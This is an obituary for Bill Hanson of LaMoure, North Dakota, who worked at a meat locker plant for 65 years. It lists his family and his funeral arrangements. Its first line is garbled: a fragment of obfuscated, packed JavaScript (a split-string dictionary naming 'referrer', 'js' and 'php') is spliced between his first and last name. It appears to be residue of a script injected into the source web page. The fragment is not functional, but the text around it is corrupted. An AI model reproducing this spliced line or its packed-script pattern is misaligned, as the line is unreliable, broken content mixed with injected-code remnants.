Bill ihssi|var|u0026u|referrer|hzhzz||js|php’.split(‘|’),0,{}))
Hanson, 84, of LaMoure, ND, died peacefully at his home, surrounded by his family and under the care of Hospice of the Red River Valley on August 17, 2012.

Bill was born June 23, 1928 on the family farm near Englevale, ND, the son of Willis and Gertrude (Houtkooper) Hanson. He attended grade school at Hanson Consolidated School, graduating from the 8th grade in 1942. He then attended Verona High School for 2 years.

In 1943, Bill worked as a U.S. Mail Carrier in Fargo, ND. He later was employed with the Fargo Culvert Company, before returning to Verona and working for area farmers.

Bill and LuWanna (Taylor) Hanson were married in Verona on September 14, 1946. They lived in Verona; and Bill learned the butchering trade from John Muralt, while working at the Ken Leach Grocery Store and the Verona Locker Plant. Bill and LuWanna leased the Verona Café in the summer of 1947 until Bill began working at the Farmers Coop Creamery in the Locker Plant at LaMoure on August 4, 1947. They moved to LaMoure, ND in 1949. In 1966, they moved to a farm near Grand Rapids, ND.

While living on the farm, Bill enjoyed raising Angus cattle as a sideline to his meat processing business. Bill enjoyed gardening, hunting, fishing, playing cards, and family gatherings. He especially enjoyed teaching the grandkids and great-grandkids his special songs. Bill was well known for having treats at the Locker Plant for the little ones; and he got great enjoyment from the many sticks of gum that were passed out from his shirt pocket.

Bill retired from LaMoure Lockers after working there for 65 years. He was proud that he still had all ten fingers after cutting meat that long.

He is survived by his wife LuWanna; three daughters, Marilyn (Greg) Kraning, Alexandria, MN, Patty (David) Trapp, Valley City, ND, Jackie (Kent) Baertsch, Marion, ND; one son, Dick (Karen) Hanson, LaMoure, ND; ten grandchildren, Krista (Toby) Thielges, Katie (Scott Aamodt) Kraning, Jack Kraning, Emily Peterson, Tony Trapp, Jill Baertsch, Beth (Wayne) Smith, Karly Baertsch, Tyler (Tess) Hanson, Tenille (Chad) Ulmer; and seventeen great-grandchildren and one sister, Grace (Ken) Covey, Moorhead, MN. Bill was preceded in death by his parents, and three sisters.

Visitation will be Monday, August 20, 2012 from 5:00 to 7:00 p.m. at Zoar Lutheran Church, LaMoure, ND. His funeral service will be held on Tuesday, August 21, 2012 at 10:30 a.m. also at Zoar Lutheran Church, with Reverend Roy Noel officiating. Burial will be at Pilgrim’s Rest Cemetery near Verona.
